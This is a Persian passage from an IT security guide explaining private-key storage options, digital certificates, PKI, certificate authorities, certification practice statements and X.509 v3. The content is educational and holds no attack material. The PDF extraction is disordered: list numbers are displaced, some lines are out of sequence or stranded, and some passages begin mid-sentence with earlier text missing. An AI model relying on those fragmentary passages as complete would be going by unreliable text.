ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﭼﻮﻥ ﺩﺭ ﺁﻥ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﻣﻨﺘﻘﻞ ﺷـﻮﺩ ،ﺟـﺎﻳﻲ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺣﻤﻠﺔ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺗﺮﺍﻭﺍﻫﺎ ،ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﻛﻠﻴﺪ ﺭﺍ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ١٣٢ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻓﺎﻳـﻞ ﺭﻭﻱ ﺩﻳـﺴﻚ .٣
ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺳﺎﺯﻳﺪ .ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ PGPﻭ Netscape Navigatorﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ
ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻫﺮﭼﻨﺪ ﺗﮑﻨﻴﮏ ﻣﻨﺎﺳﺒﻲ ﻣﻲﺑﺎﺷﺪ ،ﺍﻣﺎ ﺍﺷﻜﺎﻝ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﺔ
ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﭼﻮﻥ ﻛﻠﻴـﺪ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ ،ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻳﺎ ﺗﺮﺍﻭﺍﻫﺎ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ.
ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ /ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮﺍﻱ .۴
ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻭ ﺑﮕﻴﺮﻳﺪ .ﻣﺸﻜﻞ ﺍﺻﻠﻲ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ،
ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ،ﭼﺮﺍﮐﻪ ﻳﻜﻨﻔﺮ ﺩﻳﮕﺮ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ .ﻋﻠﻴﺮﻏﻢ ﺍﻳـﻦ ﻣـﻮﺭﺩ ،ﺑﻌـﻀﻲ
ﺳﺎﺯﻣﺎﻧﻬﺎ )ﻭ ﺑﻌﻀﻲ ﺩﻭﻟﺘﻬـﺎ( ﺍﻓﺮﺍﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺗﻬﻴﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﺗـﺎ ﺳـﺎﺯﻣﺎﻥ ﻳـﻚ
ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﻫﻤﺔ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑـﺮﺍﻱ ﺍﺷـﺨﺎﺹ ﺭﺍ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻛﻨـﺪ .ﺩﺭ
ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﮔﺰﻳﻨﺔ ﺳﻮﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ -ﺳﺎﺧﺘﻦ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﻭ ﺳـﭙﺲ ﺫﺧﻴـﺮﺓ ﺁﻥ
ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ) ١٣٣(PKIﺗﻼﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﻭﺻـﻞ ﻛـﺮﺩﻥ ﻫﻮﻳـﺖﻫـﺎ ﺑـﻪ ﺍﻣـﻀﺎﻫﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ .ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ -ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﺘﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﻳﻚ ﻫﻮﻳﺖ ﺍﺳﺖ
ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺗﻔﺴﻴﺮ ﺷﻮﺩ PKI .ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻜﻨﻮﻟﻮﮊﻳﻬﺎ ﻭ ﺧﻂﻣـﺸﻲﻫـﺎ ﺑـﺮﺍﻱ
ﺍﻳﺠﺎﺩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ .ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﭘﻴﻮﻧﺪ ﻫﻤﺰﻣﺎﻥ ﺳﻪ ﻣﺴﺌﻠﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ :ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴـﺪ
ﻋﻤﻮﻣﻲ ﻛﻪ ﺑﻪ ﺩﻗﺖ ﻧﻮﺷﺘﻪﺷﺪﻩ ،ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﺍﺟﺮﺍ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﻗـﺎﻧﻮﻧﻲ ﻛـﻪ ﺍﺟـﺮﺍﻱ ﺻـﺤﻴﺢ
ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﺿﻤﺎﻧﺖ ﻛﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ PKIﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻓﺼﻞ ﺑﻪ ﺗﻔﺼﻴﻞ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ.
ﻣﺸﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﻣﺸﻜﻞ ﻋﻤﻴﻖ ﻓﻠﺴﻔﻲ ﺍﺳﺖ .ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ ﻛﻠﻴـﺪ
ﻋﻤﻮﻣﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣﺶ ﺭﻭﻱ ﻛﻠﻴﺪ ﺍﺳﺖ؟ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻧـﺎﻣﻄﻤﺌﻦ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ
ﻛﺮﺩ؟ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﻭ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﻣﺸﺨﺺ ﺩﺭ ﺍﻳﺠﺎﺩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﺩﻧﺒﺎﻝ ﻣﻲﺷﻮﻧﺪ ،ﺩﺭ ﻋﻤﻞ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺩﺭ ﻣـﻮﺭﺩ
ﻫﻮﻳﺖ ﺻﺎﺣﺒﺎﻥ ﻛﻠﻴﺪﻫﺎ ﻭ ﺻﺤﺖ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﻤﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ.
ﺳﻪ ﺭﻭﺵ ﺍﺻﻠﻲ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻓﺮﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻣﺎﻟﻚ ﺁﻥ ﺍﺳﺖ ﺗﻌﻠﻖ ﺩﺍﺭﺩ:
ﻼ ﻣﻄﻤﺌﻦ ﺷﺪﻩ ﺑﺎﺷﻴﺪ.
ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺧﻮﺩ ﻓﺮﺩ ﺑﮕﻴﺮﻳﺪ ﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺎﻧﻴﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﻛﺎﻣ ﹰ .١
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﺩﻳﮕﺮ ﻛﻪ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎﺳﺖ ﻛﻠﻴﺪ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ. .٢
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﻭ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ،ﺻﺤﺖ ﻛﻠﻴﺪ ﺭﺍ ﮔﻮﺍﻫﻲ ﺩﺍﺩﻩ ﺍﺳﺖ. .٣
ﻻ "ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴـﺪ ﺧـﻮﺩ ﺭﺍ ﺭﻭﻱ ﺧﻼﺻﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻛﺎﺭﺗﻬﺎﻱ ﺗﺠﺎﺭﻳﺸﺎﻥ ﭼﺎﭖ ﻣﻲﻛﻨﻨﺪ ،ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﻛﺎﺭﺕ ﺗﺠﺎﺭﻱ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺟﻴﻦ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻌﺪﹰﺍ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻭ ﺭﺍ
downloadﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ.
ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺮﮐﺰ ،ﻭ ﻧﻴﺰ ﻳﻚ ﺷﻤﺎﺭﻩ ﺳﺮﻳﺎﻝ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ .ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ ،ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﺎﺹ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ .ﮔﻮﺍﻫﻲﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﺛﺒـﺎﺕ
ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﺩﺍﻧﺸﮕﺎﻩ ﻛﻪ ﭘﻴﺸﺘﺮ ﺫﻛﺮ ﺷﺪ .ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺧﺪﻣﺎﺕ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩ:
ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ،
ﭼﻨﺪ ﺗﺎﻻﺭ ﺑﻮﺭﺱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻧﺪ ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﻪ ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﭘﺮﺑﻬـﺎ ﺑﭙﺮﺩﺍﺯﻧـﺪ،
ﮔﻮﺍﻫﻲﻫﺎﻱ ﻻﺯﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ.
ﺷﻮﻧﺪ.
ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺁﻧﻬﺎ ﺍﺯ ﻗﺒﻞ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺿـﺮﺭ
ﻛﺮﺩﻩﺍﻧﺪ .ﺍﮔﺮﭼﻪ Microsoftﻭ Netscapeﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭﻫﺎﻱ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﻱ ﻫﺮ ﻣﺮﮐﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ
ﻻﺯﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ ﻣﻲﮔﺸﺎﻳﻨﺪ ،ﺍﻣﺎ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺍﺻﻠﻲ ﻭﺏ ﺑﺎ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ CAﻛﻪ ﺑﻪ ﺩﻗﺖ ﺍﻧﺘﺨﺎﺏ
ﺷﺪﻩﺍﻧﺪ ﺗﻮﺯﻳﻊ ﮔﺸﺘﻪﺍﻧﺪ .ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﻣﺘﻴﺎﺯ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮﻛﻨﻨﺪﺓ ﺁﻧﻬﺎ ﻭ ﻣـﺎﻧﻌﻲ ﺑـﺮﺍﻱ
ﺳﺎﻳﺮﻳﻦ ﺑﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٢٢
ﺳﻴﺎﺳﺖ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ ) ١٣٧(CPSﻳﻚ ﺳﻨﺪ ﻗﺎﻧﻮﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺁﻧﺮﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ ﻭ ﺗﻮﺻﻴﻒﻛﻨﻨـﺪﻩ ﺧـﻂﻣـﺸﻲﻫـﺎ ﻭ
ﻓﺮﺍﻳﻨﺪﻫﺎ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻭ ﺍﺑﻄﺎﻝ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ CPS .ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻔﻬـﻮﻡ ﺗﺄﻳﻴـﺪ
ﻳﻚ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﺁﻥ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﭼﻴﺴﺖ.
ﺍﺳﻨﺎﺩ CPSﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺴﺎﻥ ﻭ ﻧﻪ ﻣﺎﺷﻴﻦ ﺧﻮﺍﻧﺪﻩ ﺷﻮﻧﺪ .ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﮔﻮﺍﻫﻲ ﻳـﻚ ﻣﺮﮐـﺰ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺿﻤﺎﻧﺖ ﻣﻲﻛﻨﺪ ﻭ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺳﻄﺢ ﻣﻌﻴﻨـﻲ ﺍﺯ ﺗﻌﻬـﺪ ﺩﺭ ﻗﺒـﺎﻝ ﺩﻧﺒـﺎﻝ
ﻧﺸﺪﻥ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﮕﺬﺍﺭﺩ -ﻭ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻮﺳﻂ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﺘﺒﺮ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺍﮔﺮﭼﻪ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻧﻮﻋﻲ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺁﻧﻬﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻃﺒـﻖ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ X.509 v3ﻫﺴﺘﻨﺪ .ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺍﺯ ﺟﻤﻠـﻪ SSLﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻣﺠﻮﺯﻫﺎﻱ X.509 v3ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ .ﺗﻨﻬﺎ ﺍﺳﺘﺜﻨﺎﺀ ﻣﻬﻢ ﺩﺭ ﺍﻳﻨﺠﺎ PGPﺍﺳﺖ ،ﻛﻪ ﺍﺯ ﻗﺎﻟﺐ ﮔﻮﺍﻫﻲ ﻣﺨـﺼﻮﺹ ﺑـﻪ ﺧـﻮﺩﺵ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ ،ﺍﮔﺮﭼﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺁﻥ ﺑﻌﻀﻲ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ X.509ﺭﺍ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ) .ﺑﺮﻧﺎﻣـﻪ SSHﺍﺯ ﻣﺠﻮﺯﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨـﺪ ،ﺍﻣـﺎ
ﺩﺭﻋﻮﺽ ﻣﺘﻜﻲ ﺑﻪ ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ(.
ﻫﺮ ﮔﻮﺍﻫﻲ X.509ﺷﺎﻣﻞ ﻳﻚ ﺷﻤﺎﺭﺓ ﻧﺴﺨﻪ ،ﺷﻤﺎﺭﺓ ﺳﺮﻳﺎﻝ ،ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ،ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻟﮕـﻮﺭﻳﺘﻢ ،ﻭ ﺍﻣـﻀﺎﻱ ﻣﺮﻛـﺰ
ﺻﺎﺩﺭﻛﻨﻨﺪﺓ ﮔﻮﺍﻫﻲ ﺍﺳﺖ .ﺻﻨﻌﺖ ﺑﺠﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﻭﻟﻴﻪ ،X.509ﮔﻮﺍﻫﻲﻫﺎﻱ X.509 v3ﺭﺍ ﺑﺮﮔﺰﻳﺪ ،ﭼـﻮﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ X.509 v3
